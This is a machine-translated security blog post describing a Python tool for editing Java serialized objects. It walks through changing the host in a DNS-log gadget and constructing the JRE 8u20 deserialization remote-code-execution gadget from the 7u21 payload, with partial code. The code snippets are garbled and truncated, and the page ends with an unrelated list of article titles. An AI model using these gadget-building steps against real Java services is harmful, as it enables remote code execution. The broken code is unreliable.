Using Python javaserialization tools module to generate 8u20 gadget

Wide byte security 2021-01-21 16:44:00
using python javaserialization tools module

brief introduction

Recently, I was entrusted by my friends , In the use of python Write a scanner about java Deserialization vulnerability exp in , It's not easy to generate payload. At the moment, there are only two ways :

  1. python Call... By command java Of Ysoerial.jar To get gadget. There are too many shortcomings , And prepare one in the online environment jdk, For special gadget, such as 7u21 such payload, You need to prepare multiple versions of jdk.
  2. python Write directly to death gadget Bytecode .

Of course , One of the most fatal drawbacks of both methods is , It's that you can't change it at will Suid Value, etc . In the context of a deserialization attack . Often suid A case of failure to attack due to inconsistency , Of course , All kinds of tricks are in jar Find a way out of the bag , And very few people do it on deserialized files .

therefore , I follow java Deserialization protocol standard , Use python Write a module , You can read and write freely java Deserializing files . Of course , It may also be launched later Java edition .

Generate 8u20 gadget That's the most challenging thing , Because online tools , It's basically complicated , It needs to be calculated by hand handle etc. . I don't know about this one java Deserialization protocol , Very unfriendly . and ,8u20 gadget It's a malformed deserialized data .

Let's start with dnslog Speaking of , From easy to difficult , See how to use javaSerializationTools Module reading and writing java Serialized files

modify Dnslog gadget The website of

Here we don't care about dnslog This gadget How to trigger , We only care about how to modify dnslog Address .

modify dnslog The address of , In fact, it's just a modification Object's host Value of field . So let's read one first dnslog Deserialization file for , After successful parsing, save as yaml Templates for text formats .

json Storage of complex objects is not supported , such as java Circular references to objects often appear in ,json There's no way to express this relationship , and yaml Can express , But at the expense of partial readability . Mainly to reduce the workload

The sample code is as follows :

 with open("../files/dnslog.ser", "rb") as f:
a = ObjectRead(f)
dnslog = a.readContent()

Here I use the module's javaObject Class to represent a java class . Because in deserialized data , Only objects , Fields in objects and classes of objects , If there's extra data , Add to javaObject Object objectAnnoation In the list . Now let's look at the screenshot , to glance at dnslog How is it parsed

loadFactor and threshold yes HasnMap Two properties of an object , There's nothing to say here . Here's how I save java The value of the field in the object .

stay java A class in may inherit from a parent class , A parent class may also inherit from a grandparent class .java In order to save an object accurately , All fields of the object will be saved . In the deserialization restore object , First, read the class description of the object . That is, as shown in the picture above javaClass It's the same as . Then restore the value of the object , In the order of the fields in the description of the read class , Read the value of the parent class first , Then read the value of the subclass . So I save the fields as multidimensional arrays , Layer by layer . The order of the fields is related to javaCLass The order of the fields described in must be consistent .

Let's talk about it again objectAnnoation What is it . In deserialization , All values of the object are saved by default . But for HashMap For this kind of object , Value in object , That is to say key and value It's not fixed , There's no way to save . At this time writeObject and readObject The method is coming out .writeObject Methods are special ways to write extra values in an object . after writeObject Method , Will be written to ObjectAnnotation in .readObject Read , Also read ObjectAnnotation Information in . In deserialization , First write the field value of the parent class , If the parent class exists writeObject, Call again writeObject Write extra information . Then write the field value of the subclass .writeObject After the function is successfully called , Will send to ObjectAnnotation writes EndBlock Identity termination .

about hashmap The object is ,key and value Store them separately in ObjectAnnotation in . We need to find a way to modify URL Object's host Field .URL The layout of the object is shown in the figure below

It's easy to change , The code is as follows

 dnslogUrl = ''
with open('dnslog.yaml', "r") as f:
dnslog = yaml.load(f, Loader=yaml.FullLoader)
UrlObject = dnslog.objectAnnotation[2]
# modify Of host Property is new dnslog Address
dnslog.objectAnnotation[1].fields[0][4].value.string = dnslogUrl
with open('dnslog.ser', 'wb') as f:

dnslog.yaml The screenshot is as follows

Generate JRE 8u20 gadget

I've finished with the simple objects above , Now let's talk about the reading and writing of complex objects . We just need to know about jre 7u21 payload The trigger process of the . And how the fix is bypassed .

7u21 Of gadget in LinkedHashMap Of readObject Trigger sun.reflect.annotation.AnnotationInvocationHandler, Final trigger RCE. The repair method is shown in the figure below .readObject Will determine the type of deserialization , If not expected , Throws an exception directly .

We also need to review what we just said writeObject Method . Suppose an object is in serialization , call writeObject Method . be java In serialization , It doesn't serialize any field values , It's up to the object writeObject How to deal with . So in general writeObject In the method , Just save extra information , Object's field value , All to be handed over to defaultReadObject() To deal with .

although sun.reflect.annotation.AnnotationInvocationHandler Throw an exception , But objects and all the properties , In fact, it has been restored . And you can call .

Let's analyze the reasons , open java The part about restoring objects in the serialization protocol standard or I wrote it myself ObjectRead Class readObject Method

stay java In the serialization protocol , To prevent circular references , Or to save space after serialization , There will be exactly the same object , The second same object uses reference Instead of , You can understand it as c The pointer to language . In the restore object , First, create... For the restored object reference, Second, restore the value of the object .

stay sun.reflect.annotation.AnnotationInvocationHandler Of readObject in , We can see behind the code that throws the exception , And there's no extra information for us to read . therefore , Even if an exception is thrown , But the object was also successfully restored , Before throwing an exception , All the fields of the object have been restored . So we try to intercept the abnormal information , Do not interrupt the normal deserialization process . This is it. 8u20 gadget A popular explanation of .

Here we look directly at java.beans.beancontext.BeanContextSupport#readChildren Method . Extra objects are read here , And also capture exception information . Does not interrupt the normal deserialization process .

Just now we said ,ObjectAnnotation Ending , Deposit JavaEndBlockData, identification readObject The end of the read . But now it throws an exception , Lead to BeanContextSupport Of ObjectAnnotation in ,JavaEndBlockData Can't be handled properly . It will also cause all subsequent reading errors . This is the same. jre 8u20 Can't be resolved by third party software . We're generating BeanContextSupport in , Not according to the rules , stay ObjectAnnotation At the end of JavaEndBlockData identification . This is the same. 8u20 Sources of anomaly data .

So let's see 7u21 The resolution result of , Pictured

We just said , In the deserialization process , Generally, the value of the field in the object is restored first , To restore objectAnnotation The value in . We just need to insert a fake field into LinkedHashSet in ,java In deserialization , If a false deserialization value is encountered , It will not affect the normal deserialization process .

Easier said than done ,java Serialization doesn't generate this kind of malformed data . To modify by hand 7u21 Of payload, Insert a new object , All references need to be changed one by one . This workload sounds scary , And it's easy to make mistakes .

So I use javaSerializationTools modular , modify 7u21 Of gadget, Automatically calculate references, etc .

First of all to LinkedHashSet Add a new field to , Name is fake, The type is BeanContextSupport

The code is as follows

with open("../files/7u21.ser", "rb") as f:
a = ObjectRead(f)
obj = a.readContent()
# First step , towards HashSet Add a fake field , name fake
signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
fakeSignature = {'name': 'fake', 'signature': signature}

And then construct BeanContextSupport The value of the object

 # Construct a fake BeanContextSupport Deserialize object , Be careful to quote the following AnnotationInvocationHandler
# Read BeanContextSupportClass A brief introduction to the class of
with open('BeanContextSupportClass.yaml', 'r') as f1:
BeanContextSupportClassDesc = yaml.load(, Loader=yaml.FullLoader)
# towards beanContextSupportObject add to beanContextChildPeer attribute
beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
beanContextChildPeerField = JavaField('beanContextChildPeer',
# towards beanContextSupportObject add to serializable attribute
serializableField = JavaField('serializable', 'I', 1)

Finally deal with objectAnnotation, because BeanContextSupport The superclass of has writeObject Method . According to the agreement , Our first value is javaEndBlock, The second value is sun.reflect.annotation.AnnotationInvocationHandler object , Here we directly quote 7u21 Of AnnotationInvocationHandler object . such , Really working AnnotationInvocationHandler For the first successful restore AnnotationInvocationHandler The object of . And the referenced object , It will not be called in the process of being referenced again readObject Methodical .

The code is as follows

 # towards beanContextSupportObject add to objectAnnontations data
AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
# hold beanContextSupportObject Object added to fake In the attribute
fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)

Of course, there's no need to calculate handle 了 , Just use ObjectWrite Object write to file , It can be calculated automatically handle Waiting for all the fussy things

 with open("8u20.ser", 'wb') as f:
o = ObjectWrite(f)

8u20 gadget The layout is shown in the figure below

See... For the complete code

welcome fork star project , It's still in design , It will be easier to use then

Project address

本文为[Wide byte security]所创,转载请带上原文链接,感谢

  1. 【计算机网络 12(1),尚学堂马士兵Java视频教程
  2. 【程序猿历程,史上最全的Java面试题集锦在这里
  3. 【程序猿历程(1),Javaweb视频教程百度云
  4. Notes on MySQL 45 lectures (1-7)
  5. [computer network 12 (1), Shang Xuetang Ma soldier java video tutorial
  6. The most complete collection of Java interview questions in history is here
  7. [process of program ape (1), JavaWeb video tutorial, baidu cloud
  8. Notes on MySQL 45 lectures (1-7)
  9. 精进 Spring Boot 03:Spring Boot 的配置文件和配置管理,以及用三种方式读取配置文件
  10. Refined spring boot 03: spring boot configuration files and configuration management, and reading configuration files in three ways
  11. 精进 Spring Boot 03:Spring Boot 的配置文件和配置管理,以及用三种方式读取配置文件
  12. Refined spring boot 03: spring boot configuration files and configuration management, and reading configuration files in three ways
  13. 【递归,Java传智播客笔记
  14. [recursion, Java intelligence podcast notes
  15. [adhere to painting for 386 days] the beginning of spring of 24 solar terms
  16. K8S系列第八篇(Service、EndPoints以及高可用kubeadm部署)
  17. K8s Series Part 8 (service, endpoints and high availability kubeadm deployment)
  18. 【重识 HTML (3),350道Java面试真题分享
  19. 【重识 HTML (2),Java并发编程必会的多线程你竟然还不会
  20. 【重识 HTML (1),二本Java小菜鸟4面字节跳动被秒成渣渣
  21. [re recognize HTML (3) and share 350 real Java interview questions
  22. [re recognize HTML (2). Multithreading is a must for Java Concurrent Programming. How dare you not
  23. [re recognize HTML (1), two Java rookies' 4-sided bytes beat and become slag in seconds
  24. 造轮子系列之RPC 1:如何从零开始开发RPC框架
  25. RPC 1: how to develop RPC framework from scratch
  26. 造轮子系列之RPC 1:如何从零开始开发RPC框架
  27. RPC 1: how to develop RPC framework from scratch
  28. 一次性捋清楚吧,对乱糟糟的,Spring事务扩展机制
  29. 一文彻底弄懂如何选择抽象类还是接口,连续四年百度Java岗必问面试题
  30. Redis常用命令
  31. 一双拖鞋引发的血案,狂神说Java系列笔记
  32. 一、mysql基础安装
  33. 一位程序员的独白:尽管我一生坎坷,Java框架面试基础
  34. Clear it all at once. For the messy, spring transaction extension mechanism
  35. A thorough understanding of how to choose abstract classes or interfaces, baidu Java post must ask interview questions for four consecutive years
  36. Redis common commands
  37. A pair of slippers triggered the murder, crazy God said java series notes
  38. 1、 MySQL basic installation
  39. Monologue of a programmer: despite my ups and downs in my life, Java framework is the foundation of interview
  40. 【大厂面试】三面三问Spring循环依赖,请一定要把这篇看完(建议收藏)
  41. 一线互联网企业中,springboot入门项目
  42. 一篇文带你入门SSM框架Spring开发,帮你快速拿Offer
  43. 【面试资料】Java全集、微服务、大数据、数据结构与算法、机器学习知识最全总结,283页pdf
  44. 【leetcode刷题】24.数组中重复的数字——Java版
  45. 【leetcode刷题】23.对称二叉树——Java版
  46. 【leetcode刷题】22.二叉树的中序遍历——Java版
  47. 【leetcode刷题】21.三数之和——Java版
  48. 【leetcode刷题】20.最长回文子串——Java版
  49. 【leetcode刷题】19.回文链表——Java版
  50. 【leetcode刷题】18.反转链表——Java版
  51. 【leetcode刷题】17.相交链表——Java&python版
  52. 【leetcode刷题】16.环形链表——Java版
  53. 【leetcode刷题】15.汉明距离——Java版
  54. 【leetcode刷题】14.找到所有数组中消失的数字——Java版
  55. 【leetcode刷题】13.比特位计数——Java版
  56. oracle控制用户权限命令
  57. 三年Java开发,继阿里,鲁班二期Java架构师
  58. Oracle必须要启动的服务
  59. 万字长文!深入剖析HashMap,Java基础笔试题大全带答案
  60. 一问Kafka就心慌?我却凭着这份,图灵学院vip课程百度云